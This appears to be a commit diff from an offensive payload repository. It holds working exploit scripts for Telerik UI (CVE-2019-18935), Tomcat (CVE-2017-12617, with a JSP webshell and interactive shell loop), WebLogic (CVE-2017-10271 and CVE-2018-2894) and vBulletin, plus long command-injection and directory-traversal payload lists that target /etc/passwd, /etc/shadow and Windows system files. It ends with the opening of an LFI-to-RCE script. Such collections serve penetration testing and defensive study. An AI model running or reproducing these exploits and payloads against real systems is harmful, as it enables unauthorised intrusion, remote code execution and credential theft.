'UploadID': filename_remote # Determines remote filename on disk.
}
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata),
'file': (filename_remote, payload, 'application/octet-stream'),
'fileName': (None, filename_remote),
'contentType': (None, 'application/octet-stream'),
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
'metadata': (None, dumps(metadata))
}
# Send request.
print('[*] Local payload name: ', filename_local, file=stderr)
print('[*] Destination folder: ', temp_target_folder, file=stderr)
print('[*] Remote payload name:', filename_remote, file=stderr)
print(file=stderr)
send_request(files)
def deserialize():
# Build rauPostData.
object = {
'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
}
type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
raupostdata = build_raupostdata(object, type)
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata), # Only need this now.
'': '' # One extra input is required for the page to process the request.
}
# Send request.
print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
start = time()
send_request(files)
end = time()
print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
parser.add_argument('-v', dest='ui_version', required=True, help='software version')
parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
args = parser.parse_args()
temp_target_folder = args.folder.replace('/', '\\')
ui_version = args.ui_version
net_version = args.net_version
filename_local = args.payload
filename_remote = str(time()) + splitext(basename(filename_local))[1]
url = args.url
upload()
if not args.test_upload:
deserialize()

239
CVE Exploits/Tomcat CVE-2017-12617.py Normal file
View File

@ -0,0 +1,239 @@
#!/usr/bin/python
# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
"""
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
"""
from __future__ import print_function
from builtins import input
from builtins import str
from builtins import object
import requests
import re
import signal
from optparse import OptionParser
class bcolors(object):
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
re=requests.get(str(url)+"/"+str(f), headers=headers)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201:
print("File Created ..")
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content)
t=removetags(re)
print(t)
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U)
checker="Poc.jsp"
print(bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else:
print('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P)
url=str(opt.U)
print("Uploading Webshell .....")
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L)
f=open(w,"r")
print("Scaning hosts in {}".format(w))
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")

72
CVE Exploits/WebLogic CVE-2016-3510.py Normal file
View File

File diff suppressed because one or more lines are too long

63
CVE Exploits/WebLogic CVE-2017-10271.py Normal file
View File

@ -0,0 +1,63 @@
from __future__ import print_function
from builtins import input
import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&amp;",
'"': "&quot;",
"'": "&apos;",
">": "&gt;",
"<": "&lt;",
}
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
" <soapenv:Header> " \
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
" <void class=\"java.lang.ProcessBuilder\"> \n" \
" <array class=\"java.lang.String\" length=\"3\">" \
" <void index = \"0\"> " \
" <string>cmd</string> " \
" </void> " \
" <void index = \"1\"> " \
" <string>/c</string> " \
" </void> " \
" <void index = \"2\"> " \
+ command_filtered + \
" </void> " \
" </array>" \
" <void method=\"start\"/>" \
" </void>" \
" </java>" \
" </work:WorkContext>" \
" </soapenv:Header>" \
" <soapenv:Body/>" \
"</soapenv:Envelope>"
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print("Command Executed \n")
else:
print("Something Went Wrong \n")
print("***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n")
while 1:
command_in = input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)

128
CVE Exploits/WebLogic CVE-2018-2894.py Normal file
View File

@ -0,0 +1,128 @@
#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
from __future__ import print_function
from builtins import str
import re
import sys
import time
import argparse
import requests
import traceback
import xml.etree.ElementTree as ET
def get_current_work_path(host):
geturl = host + "/ws_utc/resources/setting/options/general"
ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
values = []
try:
request = requests.get(geturl)
if request.status_code == 404:
exit("[-] {} don't exists CVE-2018-2894".format(host))
elif "Deploying Application".lower() in request.text.lower():
print("[*] First Deploying Website Please wait a moment ...")
time.sleep(20)
request = requests.get(geturl, headers=ua)
if "</defaultValue>" in request.content:
root = ET.fromstring(request.content)
value = root.find("section").find("options")
for e in value:
for sub in e:
if e.tag == "parameter" and sub.tag == "defaultValue":
values.append(sub.text)
except requests.ConnectionError:
exit("[-] Cannot connect url: {}".format(geturl))
if values:
return values[0]
else:
print("[-] Cannot get current work path\n")
exit(request.content)
def get_new_work_path(host):
origin_work_path = get_current_work_path(host)
works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
if "user_projects" in origin_work_path:
if "\\" in origin_work_path:
works = works.replace("/", "\\")
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
dir_len = len(current_work_home.split("\\"))
domain_name = origin_work_path.split("\\")[dir_len]
current_work_home += "\\" + domain_name + works
else:
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
dir_len = len(current_work_home.split("/"))
domain_name = origin_work_path.split("/")[dir_len]
current_work_home += "/" + domain_name + works
else:
current_work_home = origin_work_path
print("[*] cannot handle current work home dir: {}".format(origin_work_path))
return current_work_home
def set_new_upload_path(host, path):
data = {
"setting_id": "general",
"BasicConfigOptions.workDir": path,
"BasicConfigOptions.proxyHost": "",
"BasicConfigOptions.proxyPort": "80"}
request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
if "successfully" in request.content:
return True
else:
print("[-] Change New Upload Path failed")
exit(request.content)
def upload_webshell(host, uri):
set_new_upload_path(host, get_new_work_path(host))
files = {
"ks_edit_mode": "false",
"ks_password_front": password,
"ks_password_changed": "true",
"ks_filename": ("360sglab.jsp", upload_content)
}
request = requests.post(host + uri, files=files)
response = request.text
match = re.findall("<id>(.*?)</id>", response)
if match:
tid = match[-1]
shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
if upload_content in requests.get(shell_path, headers=headers).content:
print("[+] {} exists CVE-2018-2894".format(host))
print("[+] Check URL: {} ".format(shell_path))
else:
print("[-] {} don't exists CVE-2018-2894".format(host))
else:
print("[-] {} don't exists CVE-2018-2894".format(host))
if __name__ == "__main__":
start = time.time()
password = "360sglab"
url = "/ws_utc/resources/setting/keystore"
parser = argparse.ArgumentParser()
parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
help="target, such as: http://example.com:7001")
upload_content = "360sglab test"
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest', }
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
target = args.target
target = target.rstrip('/')
if "://" not in target:
target = "http://" + target
try:
upload_webshell(target, url)
except Exception as e:
print("[-] Error: \n")
traceback.print_exc()

80
CVE Exploits/WebSphere CVE-2015-7450.py Normal file
View File

File diff suppressed because one or more lines are too long

5994
CVE Exploits/index.html Normal file
View File

File diff suppressed because one or more lines are too long

1
CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh Normal file
View File

@ -0,0 +1 @@
curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"

6287
Clickjacking/index.html Normal file
View File

File diff suppressed because one or more lines are too long

83
Command Injection/Intruder/command-execution-unix.txt Normal file
View File

@ -0,0 +1,83 @@
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
";id;"
';id;'
;id;
;id
;netstat -a;
"|id|"
'|id|'
|id
|/usr/bin/id
|id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A
%0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

448
Command Injection/Intruder/command_exec.txt Normal file
View File

File diff suppressed because one or more lines are too long

6661
Command Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5937
DNS Rebinding/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5856
Dependency Confusion/index.html Normal file
View File

File diff suppressed because one or more lines are too long

879
Directory Traversal/Intruder/deep_traversal.txt Normal file
View File

File diff suppressed because one or more lines are too long

140
Directory Traversal/Intruder/directory_traversal.txt Normal file
View File

@ -0,0 +1,140 @@
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

21144
Directory Traversal/Intruder/dotdotpwn.txt Normal file
View File

File diff suppressed because it is too large Load Diff

887
Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt Normal file
View File

File diff suppressed because one or more lines are too long

6234
Directory Traversal/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5942
Dom Clobbering/index.html Normal file
View File

File diff suppressed because one or more lines are too long

60
File Inclusion/Files/LFI2RCE.py Normal file
View File

@ -0,0 +1,60 @@
import requests
url = "http://localhost:8000/chall.php"
file_to_use = "/etc/passwd"
command = "id"
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
conversions = {
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
